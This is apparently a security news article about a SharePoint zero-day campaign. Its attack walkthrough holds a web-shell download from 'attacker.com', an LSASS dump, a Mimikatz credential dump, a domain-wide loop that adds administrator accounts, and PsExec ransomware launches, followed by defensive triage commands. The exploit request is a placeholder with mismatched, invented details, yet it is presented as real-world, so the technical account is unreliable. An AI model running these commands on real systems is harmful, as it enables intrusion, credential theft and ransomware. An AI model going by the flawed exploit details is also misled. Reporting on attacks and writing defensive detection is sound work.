data breaches

Microsoft SharePoint Under Attack: Ransomware Surge Follows Zero-Day Exploit

Published

3 months ago

on

Forensic investigations reveal how attackers exploited a SharePoint flaw using PowerShell, web shells, and lateral movement—now joined by ransomware payloads. We explain the exploit chain, with real-world command-line examples and defenses.

July 24, 2025

A critical zero-day vulnerability in Microsoft SharePoint is enabling one of the most damaging cyberattacks of the year. Over 400 organizations—government agencies, hospitals, financial institutions—have been breached through a remote code execution flaw that allows unauthenticated access, full server takeover, and ransomware deployment.

Security researchers at Eye Security discovered the exploit, which leverages malicious HTTP requests and PowerShell payloads to infiltrate systems.

“This attack shows a high degree of automation and precision,” said Rick van der Wal, Eye Security’s Chief Threat Analyst. “It’s stealthy, fast, and ends in full enterprise lockout via ransomware.”

⚙️ 🧠 TECHNICAL ATTACK FLOW – WITH COMMAND EXAMPLES

▶️ Phase 1: Initial Exploitation via SharePoint Web Service

Attackers bypass authentication using a crafted SOAP request to /_vti_bin/sites.asmx, exploiting input validation weaknesses.

http

POST /_vti_bin/sites.asmx HTTP/1.1
Host: victim-org.com
User-Agent: Mozilla/5.0
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://schemas.microsoft.com/sharepoint/soap/GetListItems"
Payload: [malicious XML invoking backend deserialization]

▶️ Phase 2: Web Shell Deployment

Once authenticated, attackers upload a web shell (e.g., china.aspx) to the SharePoint image directory.

Powershell

Invoke-WebRequest -Uri "http://attacker.com/webshell/china.aspx" -OutFile "C:\inetpub\wwwroot\wss\VirtualDirectories\80\_layouts\images\china.aspx"

🔎 This creates a persistent backdoor accessible via browser.

▶️ Phase 3: Privilege Escalation & Credential Theft

They use built-in tools to dump credentials and escalate:

Powershell

# Dumping LSASS memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 1234 lsass.dmp full

# Using Mimikatz to extract credentials
Invoke-Expression -Command "Invoke-Mimikatz -DumpCreds"

▶️ Phase 4: Lateral Movement

With credentials harvested, attackers pivot to domain machines using remote PowerShell:

PowerShell

$computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
foreach ($comp in $computers) {
    Invoke-Command -ComputerName $comp -ScriptBlock {
        net user hacked Password123! /add
        net localgroup administrators hacked /add
    }
}

🧨 Backdoors are installed, domain persistence is achieved.

▶️ Phase 5: Ransomware Deployment

They drop ransomware executables across the network via SMB or PsExec:

cmd

psexec \\target-machine -u admin -p Password123! -h -d "C:\Temp\payload.exe"

OR using PowerShell:

PowerShell

Start-Process "C:\Users\Public\encrypt.exe" -ArgumentList "/s /n /silent"

🛡️ DEFENSIVE MITIGATIONS – COMMAND-LINE FIXES AND FORENSIC TRIAGE

1. Identify Suspicious .ASPX Files

Check for rogue web shells in SharePoint directories:

PowerShell

Get-ChildItem -Recurse "C:\inetpub\wwwroot\" -Filter *.aspx | 
Where-Object { (Get-Content $_.FullName -Raw) -match "eval|base64_decode|cmd.exe|powershell" }

2. Disable External Access to SharePoint Services

Block SharePoint from internet exposure temporarily:

PowerShell

New-NetFirewallRule -DisplayName "Block SharePoint External Access" `
-Direction Inbound -Action Block -Protocol TCP -LocalPort 80,443

3. Audit Suspicious Scheduled Tasks

List all tasks added recently:

PowerShell

Get-ScheduledTask | Where-Object {
    $_.Actions -match "encrypt.exe" -or $_.Description -match "backup"
}

4. Remove Rogue Users

Check for unauthorized accounts:

PowerShell

Get-LocalUser | Where-Object { $_.Name -match "admin|test|support" -and $_.Enabled -eq $true }

Remove them:

PowerShell

Remove-LocalUser -Name "hacked"

5. Harden SharePoint & IIS Configurations

Disable script execution:

PowerShell

Set-WebConfigurationProperty -Filter "system.webServer/handlers" -PSPath "IIS:\Sites\Default Web Site" -Name "accessPolicy" -Value "Read"

🧪 Forensic Response Checklist

  • Live Memory Capture: Use tools like FTK Imager or Magnet RAM Capture
  • Event Log Collection:
  • PowerShell
  • wevtutil qe Security "/q:*[System[(EventID=4624)]]" /f:text /c:100
  • Network Traffic Analysis: Dump logs from firewall/proxy
  • Hash Suspicious Binaries:
  • PowerShell
  • Get-FileHash -Path "C:\Temp\encrypt.exe" -Algorithm SHA256

⚠️ MICROSOFT’S POSITION AND INDUSTRY RESPONSE

Microsoft has acknowledged the breach and is working on a security patch. CISA and ENISA have issued directives urging agencies to isolate SharePoint, disable public access, and conduct full threat hunts.

“We are monitoring the situation closely,” Microsoft stated. “Customers should restrict access and deploy threat hunting scripts immediately.”

📰 Sources

  1. Eye Security – First to identify the SharePoint exploit and rising victim count.
    www.eyesecurity.com
  2. Reuters – Reported Microsoft’s confirmation of ransomware deployment.
    www.reuters.com
  3. Bloomberg News – Covered the initial wave of SharePoint breaches.
    www.bloomberg.com
  4. Microsoft Security Response Center (MSRC) – Official advisories and mitigation guidance.
    msrc.microsoft.com
  5. CISA (Cybersecurity & Infrastructure Security Agency) – Emergency directive for U.S. agencies.
    www.cisa.gov

Related Topics:

Trending

Exit mobile version